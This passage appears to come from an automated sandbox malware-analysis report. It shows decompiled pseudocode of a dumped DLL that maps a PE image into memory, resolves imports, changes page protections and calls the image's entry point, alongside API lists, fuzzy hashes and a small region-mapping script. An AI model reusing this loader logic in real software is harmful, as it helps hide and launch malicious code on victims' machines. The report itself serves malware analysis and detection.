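    return [(r["base"] - module_base, r["protect"], r["type"], r["executable"]) for r in rows]


# Names copied from this report's "Memory Dump Source" list (module base 0x66DB0000).
DUMPS = [
    "00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp",
    "00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp",
    "00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp",
    "00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp",
    "00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    for rva, prot, typ, x in map_regions(DUMPS, 0x66DB0000):
        print(f"RVA 0x{rva:05x}  {prot:<22} {typ:<12} {'code' if x else 'data'}")
```

Under that reading the layout is a plain PE: read-only headers at RVA 0, the only executable region at RVA 0x1000 (where both functions on this page live), and a single read-write region at RVA 0x5000. If the last field really is the MBI Type, MEM_PRIVATE rather than MEM_IMAGE for a region flagged "based on PE: true" is the kind of detail worth checking in the dump itself, since an image loaded through the normal loader is backed by a section object and reports MEM_IMAGE.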

                                                                                                                                                                              C-Code - Quality: 87%
			E66DB1D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed       (mask 1: pin the calling thread to CPU 0)
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed     (-1 = THREAD_PRIORITY_BELOW_NORMAL)
				}
				_t4 = E66DB17A7(_a4); // executed                        (the actual work runs pinned and at lowered priority)
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);                         // _t4 is 0 here: THREAD_PRIORITY_NORMAL is restored only on success; the affinity mask is not restored
				}
				asm("lock xadd [eax], ecx");                              // interlocked add on a global counter (InterlockedExchangeAdd idiom)
				return _t9;
			}

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 66DB1D35
                                                                                                                                                                              • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 66DB1D40
                                                                                                                                                                              • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 66DB1D53
                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 66DB1D66
                                                                                                                                                                              Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID: Thread$Priority$AffinityCurrentMask
• String ID:
• API String ID: 1452675757-0
• Opcode ID: 2c0ae6bb7ee504249ac47ba55eeaefb415ba824c806c4ab308777a0299a79d0c
• Instruction ID: a6b41c4a6dc3f59a75c19700aa6ae3fc4403215a979f8df3070fabf350559c05
• Opcode Fuzzy Hash: 2c0ae6bb7ee504249ac47ba55eeaefb415ba824c806c4ab308777a0299a79d0c
• Instruction Fuzzy Hash: 0BE09BB1715320ABA7015F294C84E5F6B5DDFD33317130335F625D21D8DB645C0595A5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
			E66DB1030(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x66db41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

APIs
• VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 66DB1069
• VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 66DB10DE
• GetLastError.KERNEL32 ref: 66DB10E4
Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID: ProtectVirtual$ErrorLast
• String ID:
• API String ID: 1469625949-0
• Opcode ID: 85039a82b22c49f32865e885e19b7e77789353bbc9ecb7cb8fe25881786efaa9
• Instruction ID: d99e6ff677cc2fb44b59525c154fe1f3d2b3e8930040dcb4bd71d200df6dc5ae
• Opcode Fuzzy Hash: 85039a82b22c49f32865e885e19b7e77789353bbc9ecb7cb8fe25881786efaa9
• Instruction Fuzzy Hash: DF215EB1C00206DFCB14CF96C881AAAF7F5FF44359F008859D10797489E378A6A9CB51
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%
			E66DB16EC() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x66db41c4);
				_push(1);
				_push( *0x66db41d0 + 0x66db5089);
				 *0x66db41c0 = 0xc;
				 *0x66db41c8 = 0; // executed
				L66DB14D8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E66DB1112( &_v44,  &_v28,  *0x66db41cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x66db41b8);
                                                                                                                                                                              				_t7 = _t24 + 2; // 0x2
                                                                                                                                                                              				_t10 = _t24 + _t7 + 8; // 0xa
                                                                                                                                                                              				_t28 = E66DB1979(_t36, _t10,  &_v48,  &_v52); // executed
                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                              					_t30 = _v52;
                                                                                                                                                                              					 *_t30 = 0;
                                                                                                                                                                              					if( *0x66db41b8 == 0) {
                                                                                                                                                                              						 *((short*)(_t30 + 4)) = 0;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						E66DB2112(_t40, _t30 + 4);
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				_t23 = E66DB1236(_v44); // executed
                                                                                                                                                                              				goto L7;
                                                                                                                                                                               			}

                                                                                                                                                                              APIs
                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,66DB41C4,00000000), ref: 66DB171D
                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?), ref: 66DB1751
                                                                                                                                                                                • Part of subcall function 66DB1979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?,?), ref: 66DB1986
                                                                                                                                                                                • Part of subcall function 66DB1979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 66DB199C
                                                                                                                                                                                • Part of subcall function 66DB1979: _snwprintf.NTDLL ref: 66DB19C1
                                                                                                                                                                                • Part of subcall function 66DB1979: CreateFileMappingW.KERNELBASE(000000FF,66DB41C0,00000004,00000000,?,?), ref: 66DB19E6
                                                                                                                                                                                • Part of subcall function 66DB1979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?), ref: 66DB19FD
                                                                                                                                                                                • Part of subcall function 66DB1979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A), ref: 66DB1A32
                                                                                                                                                                              • ExitThread.KERNEL32 ref: 66DB17A0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                               • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
                                                                                                                                                                               • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
                                                                                                                                                                               • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
                                                                                                                                                                               • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4209869662-0
                                                                                                                                                                              • Opcode ID: 5c6bd98f750b8500a29b8021b27eb1d857a556e63853cbb3c21b73553301fea5
                                                                                                                                                                              • Instruction ID: 5f06ccaebdaba03593cdbe933bf065fcaf1cedbbd7d6c7f0ab3829796addcb1c
                                                                                                                                                                              • Opcode Fuzzy Hash: 5c6bd98f750b8500a29b8021b27eb1d857a556e63853cbb3c21b73553301fea5
                                                                                                                                                                              • Instruction Fuzzy Hash: 5D11BBF2904211EFEB10CF65CC44E9B7BEDAB99398F050A16F206DB04CDB30E4188BA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                              			E66DB1C12(void* __ecx) {
                                                                                                                                                                              				void* _v8;
                                                                                                                                                                              				char _v12;
                                                                                                                                                                              				signed short _t15;
                                                                                                                                                                              				char* _t18;
                                                                                                                                                                              				char* _t25;
                                                                                                                                                                              				char* _t29;
                                                                                                                                                                              
                                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                              				if(E66DB1112( &_v8,  &_v12,  *0x66db41cc ^ 0x196db149) != 0) {
                                                                                                                                                                              					if(_v8 == 0) {
                                                                                                                                                                              						_t29 = 0;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_t29 = E66DB1BCB(_t22, _v8,  *0x66db41cc ^ 0x6e49bbff);
                                                                                                                                                                              					}
                                                                                                                                                                              					if(_t29 != 0) {
                                                                                                                                                                              						_t15 = E66DB1566(_t22); // executed
                                                                                                                                                                              						_v12 = _t15 & 0x0000ffff;
                                                                                                                                                                              						_t18 = StrStrIA(_t29,  &_v12); // executed
                                                                                                                                                                              						if(_t18 != 0) {
                                                                                                                                                                              							_t25 = 0x657;
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              					HeapFree( *0x66db4190, 0, _v8);
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t25;
                                                                                                                                                                               			}

                                                                                                                                                                              APIs
                                                                                                                                                                              • StrStrIA.KERNELBASE(00000000,66DB1810,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1C69
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1C83
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                               • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
                                                                                                                                                                               • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
                                                                                                                                                                               • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
                                                                                                                                                                               • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                              • Opcode ID: 0a40f8551c3e8cdbf58ee8951383bb48f2e56e66520cf7432c093906f0e46dd7
                                                                                                                                                                              • Instruction ID: ff6f06adaacaa81b0583be3478b49148b5a1d9cbd31b8a537c3ed2c3c59e9ea1
                                                                                                                                                                              • Opcode Fuzzy Hash: 0a40f8551c3e8cdbf58ee8951383bb48f2e56e66520cf7432c093906f0e46dd7
                                                                                                                                                                              • Instruction Fuzzy Hash: C90144F6D00114EB9B01CFA5CD40E9FBBBEAB86640F150161E602E714CEA31DE0197B4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

APIs
• VirtualProtectEx.KERNELBASE(000000FF,?,00000040,66EFDC5C), ref: 66DE2C44
Memory Dump Source
• Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 5dca1247c0d09c46b7f57ce01884c97a39ad0858b450da63160b15a2e4bb61b8
• Instruction ID: bede9598605eda90b466ce8bb50e6b0e85fd76cd50827d7477da91a1662cfde2
• Opcode Fuzzy Hash: 5dca1247c0d09c46b7f57ce01884c97a39ad0858b450da63160b15a2e4bb61b8
• Instruction Fuzzy Hash: E1F0EC761082E0EFEF051F7978648A03F6E97D7110B185086F79886393C574744DDF59
Uniqueness
Uniqueness Score: -1.00%

APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,?,66DE39BC,?), ref: 66DE8516
Memory Dump Source
• Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: 4b85dfd3bf3d8a88e23f46e7fa5a86359fa33bb69467cf5235b2c009f96da84f
• Instruction ID: 35d95bed25c05d93c4154094161e438e73c643da5b6766502b429096c5e3a4ba
• Opcode Fuzzy Hash: 4b85dfd3bf3d8a88e23f46e7fa5a86359fa33bb69467cf5235b2c009f96da84f
• Instruction Fuzzy Hash: F6D0A776964395AFEF009F716C08B663BEDE3C5396F10443AFA0DC6140FA74C550CA40
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 86%
			E66DB1236(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				intOrPtr _t16;   /* used below; declaration omitted by the decompiler */
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t33;   /* used below; declaration omitted by the decompiler */
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;                       /* __eax: base of the source PE image in memory */
				_t16 =  *0x66db41cc;                /* global constant that obfuscates the size arithmetic below */
				/* __eax + 0x3c is e_lfanew; NT headers + 0x50 is OptionalHeader.SizeOfImage (PE32) */
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x66db41cc - 0x63698bc4 &  !( *0x66db41cc - 0x63698bc4);
				_t18 = E66DB1AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x66db41cc - 0x63698bc4 &  !( *0x66db41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x66db41cc - 0x63698bc4 &  !( *0x66db41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed; subcall resolves APIs via GetModuleHandleA/GetProcAddress (see APIs below)
				if(_t18 != 0) {
					_t29 = 8;                       /* 8 == ERROR_NOT_ENOUGH_MEMORY */
					goto L8;
				} else {
					_t40 = _v8;                     /* destination image base returned by the subcall */
					_t29 = E66DB14DE(_t33, _t40, _t41);     /* subcall copies data with memcpy (see APIs below) */
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;     /* NT headers of the destination image */
						_t24 = E66DB1F31(_t40, _t44); // executed; subcall uses LoadLibraryA
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E66DB1030(_t44, _t40); // executed; subcall uses VirtualProtect
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								/* NT headers + 0x28 is OptionalHeader.AddressOfEntryPoint; called with (base, 1, 0) */
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;                    /* cleanup through the object returned in _v12 */
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E66DB136A(_t42);
					L8:
					return _t29;
				}
			}

APIs
  • Part of subcall function 66DB1AA5: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AC9
  • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AEB
  • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B01
  • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B17
  • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B2D
  • Part of subcall function 66DB1AA5: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B43
  • Part of subcall function 66DB14DE: memcpy.NTDLL(?,?,?,?,?,?,?,?,66DB1280,?,?,?,?,?,?), ref: 66DB150B
  • Part of subcall function 66DB14DE: memcpy.NTDLL(?,?,?), ref: 66DB153E
  • Part of subcall function 66DB1F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 66DB1F69
  • Part of subcall function 66DB1030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 66DB1069
  • Part of subcall function 66DB1030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 66DB10DE
  • Part of subcall function 66DB1030: GetLastError.KERNEL32 ref: 66DB10E4
• GetLastError.KERNEL32(?,?,?,?,?), ref: 66DB12B4
Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
• String ID:
• API String ID: 2673762927-0
• Opcode ID: dd5e0faaa6bbc5de03447629b0a6e8d646c505646568a4392c32092f73f0e458
• Instruction ID: 1f6a5e53b768758e7b2feb804e820e4633b05f043dc018b67f8193ef501b512b
• Opcode Fuzzy Hash: dd5e0faaa6bbc5de03447629b0a6e8d646c505646568a4392c32092f73f0e458
• Instruction Fuzzy Hash: A311EEF6610715EFD7219BA9CC80D9B77BCAF893147040159E903D7649E7B1ED0687E0
Uniqueness
Uniqueness Score: -1.00%

Non-executed Functions

APIs
Memory Dump Source
• Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
Similarity
• API ID: ___getlocaleinfo
• String ID:
• API String ID: 1937885557-0
• Opcode ID: 1292dd35ec3191d005f7a258ba019026780381556e0f9dfe3b84806f3d4b0144
• Instruction ID: 61dfaed27d457a3e4273e7729a40b7abed099c4c08e9f97ab4ceef8921921686
• Opcode Fuzzy Hash: 1292dd35ec3191d005f7a258ba019026780381556e0f9dfe3b84806f3d4b0144
• Instruction Fuzzy Hash: 16E1ACB290021DFEEF21CBE1CC84DFF7BBDEB54748F04096AB255A2050EA75AA159770
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
E66DB146C() {
	void* _t1;
	long _t3;
	void* _t4;
	long _t5;
	void* _t6;
	intOrPtr _t8;

	_t8 = *0x66db41b0;
	_t1 = CreateEventA(0, 1, 0, 0);
	*0x66db41bc = _t1;
	if(_t1 == 0) {
		return GetLastError();
	}
	_t3 = GetVersion();
	if(_t3 <= 5) {
		_t4 = 0x32;
		return _t4;
	} else {
		*0x66db41ac = _t3;
		_t5 = GetCurrentProcessId();
		*0x66db41a8 = _t5;
		*0x66db41b0 = _t8;
		_t6 = OpenProcess(0x10047a, 0, _t5);
		*0x66db41a4 = _t6;
		if(_t6 == 0) {
			*0x66db41a4 = *0x66db41a4 | 0xffffffff;
		}
		return 0;
	}
}

APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,66DB17B8,73B763F0,00000000), ref: 66DB147B
• GetVersion.KERNEL32 ref: 66DB148A
• GetCurrentProcessId.KERNEL32 ref: 66DB1499
• OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 66DB14B2
Memory Dump Source
• Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
• Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp
• Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp
• Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp
Similarity
• API ID: Process$CreateCurrentEventOpenVersion
• String ID:
• API String ID: 845504543-0
• Opcode ID: 56595e330e6b7d2c8f0e35bb74333b5bfa9c0555f6329e3e0a3fb50d0e939834
• Instruction ID: 04365ce68f184c71fd3980ed675d1d17924d4d2952e334b2a11df707d6902718
• Opcode Fuzzy Hash: 56595e330e6b7d2c8f0e35bb74333b5bfa9c0555f6329e3e0a3fb50d0e939834
• Instruction Fuzzy Hash: C0F049F0A45230EFFF00CF6AAC057413BA6BB8A791F190019F315D90CCD77088509B04
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E66DB2485(long _a4) {
	intOrPtr _v8;
	intOrPtr _v12;
	signed int _v16;
	short* _v32;
	void _v36;
	void* _t57;
	signed int _t58;
	signed int _t61;
	signed int _t62;
	void* _t63;
	signed int* _t68;
	intOrPtr* _t69;
	intOrPtr* _t71;
	intOrPtr _t72;
	intOrPtr _t75;
	void* _t76;
	signed int _t77;
	void* _t78;
	void _t80;
	signed int _t81;
	signed int _t84;
	signed int _t86;
	short* _t87;
	void* _t89;
	signed int* _t90;
	long _t91;
	signed int _t93;
	signed int _t94;
	signed int _t100;
	signed int _t102;
	void* _t104;
	long _t108;
	signed int _t110;

	_t108 = _a4;
	_t76 = *(_t108 + 8);
	if((_t76 & 0x00000003) != 0) {
		L3:
		return 0;
	}
	_a4 = *[fs:0x4];
	_v8 = *[fs:0x8];
	if(_t76 < _v8 || _t76 >= _a4) {
		_t102 = *(_t108 + 0xc);
		__eflags = _t102 - 0xffffffff;
		if(_t102 != 0xffffffff) {
			_t91 = 0;
			__eflags = 0;
			_a4 = 0;
			_t57 = _t76;
			do {
				_t80 = *_t57;
				__eflags = _t80 - 0xffffffff;
				if(_t80 == 0xffffffff) {
					goto L9;
				}
				__eflags = _t80 - _t91;
				if(_t80 >= _t91) {
					L20:
					_t63 = 0;
					L60:
					return _t63;
				}
				L9:
				__eflags = *(_t57 + 4);
				if( *(_t57 + 4) != 0) {
					_t12 = &_a4;
					*_t12 = _a4 + 1;
					__eflags = *_t12;
				}
				_t91 = _t91 + 1;
				_t57 = _t57 + 0xc;
				__eflags = _t91 - _t102;
			} while (_t91 <= _t102);
			__eflags = _a4;
			if(_a4 == 0) {
				L15:
				_t81 = *0x66db41f8;
				_t110 = _t76 & 0xfffff000;
				_t58 = 0;
				__eflags = _t81;
				if(_t81 <= 0) {
					L18:
					_t104 = _t102 | 0xffffffff;
					_t61 = NtQueryVirtualMemory(_t104, _t76, 0, &_v36, 0x1c, &_a4);
					__eflags = _t61;
					if(_t61 < 0) {
						_t62 = 0;
						__eflags = 0;
					} else {
						_t62 = _a4;
					}
					__eflags = _t62;
					if(_t62 == 0) {
						L59:
						_t63 = _t104;
                                                                                                                                                                              									goto L60;
                                                                                                                                                                              								} else {
                                                                                                                                                                              									__eflags = _v12 - 0x1000000;
                                                                                                                                                                              									if(_v12 != 0x1000000) {
                                                                                                                                                                              										goto L59;
                                                                                                                                                                              									}
                                                                                                                                                                              									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                              									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                              										L46:
                                                                                                                                                                              										_t63 = 1;
                                                                                                                                                                              										 *0x66db4240 = 1;
                                                                                                                                                                              										__eflags =  *0x66db4240;
                                                                                                                                                                              										if( *0x66db4240 != 0) {
                                                                                                                                                                              											goto L60;
                                                                                                                                                                              										}
                                                                                                                                                                              										_t84 =  *0x66db41f8;
                                                                                                                                                                              										__eflags = _t84;
                                                                                                                                                                              										_t93 = _t84;
                                                                                                                                                                              										if(_t84 <= 0) {
                                                                                                                                                                              											L51:
                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                              											if(_t93 != 0) {
                                                                                                                                                                              												L58:
                                                                                                                                                                              												 *0x66db4240 = 0;
                                                                                                                                                                              												goto L5;
                                                                                                                                                                              											}
                                                                                                                                                                              											_t77 = 0xf;
                                                                                                                                                                              											__eflags = _t84 - _t77;
                                                                                                                                                                              											if(_t84 <= _t77) {
                                                                                                                                                                              												_t77 = _t84;
                                                                                                                                                                              											}
                                                                                                                                                                              											_t94 = 0;
                                                                                                                                                                              											__eflags = _t77;
                                                                                                                                                                              											if(_t77 < 0) {
                                                                                                                                                                              												L56:
                                                                                                                                                                              												__eflags = _t84 - 0x10;
                                                                                                                                                                              												if(_t84 < 0x10) {
                                                                                                                                                                              													_t86 = _t84 + 1;
                                                                                                                                                                              													__eflags = _t86;
                                                                                                                                                                              													 *0x66db41f8 = _t86;
                                                                                                                                                                              												}
                                                                                                                                                                              												goto L58;
                                                                                                                                                                              											} else {
                                                                                                                                                                              												do {
                                                                                                                                                                              													_t68 = 0x66db4200 + _t94 * 4;
                                                                                                                                                                              													_t94 = _t94 + 1;
                                                                                                                                                                              													__eflags = _t94 - _t77;
                                                                                                                                                                              													 *_t68 = _t110;
                                                                                                                                                                              													_t110 =  *_t68;
                                                                                                                                                                              												} while (_t94 <= _t77);
                                                                                                                                                                              												goto L56;
                                                                                                                                                                              											}
                                                                                                                                                                              										}
                                                                                                                                                                              										_t69 = 0x66db41fc + _t84 * 4;
                                                                                                                                                                              										while(1) {
                                                                                                                                                                              											__eflags =  *_t69 - _t110;
                                                                                                                                                                              											if( *_t69 == _t110) {
                                                                                                                                                                              												goto L51;
                                                                                                                                                                              											}
                                                                                                                                                                              											_t93 = _t93 - 1;
                                                                                                                                                                              											_t69 = _t69 - 4;
                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                              											if(_t93 > 0) {
                                                                                                                                                                              												continue;
                                                                                                                                                                              											}
                                                                                                                                                                              											goto L51;
                                                                                                                                                                              										}
                                                                                                                                                                              										goto L51;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t87 = _v32;
                                                                                                                                                                              									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                              									if( *_t87 != 0x5a4d) {
                                                                                                                                                                              										goto L59;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                              									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                              									if( *_t71 != 0x4550) {
                                                                                                                                                                              										goto L59;
                                                                                                                                                                              									}
                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                              									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                              										goto L59;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t78 = _t76 - _t87;
                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                              									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                              									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                              										goto L59;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                              									__eflags = _t78 - _t72;
                                                                                                                                                                              									if(_t78 < _t72) {
                                                                                                                                                                              										goto L46;
                                                                                                                                                                              									}
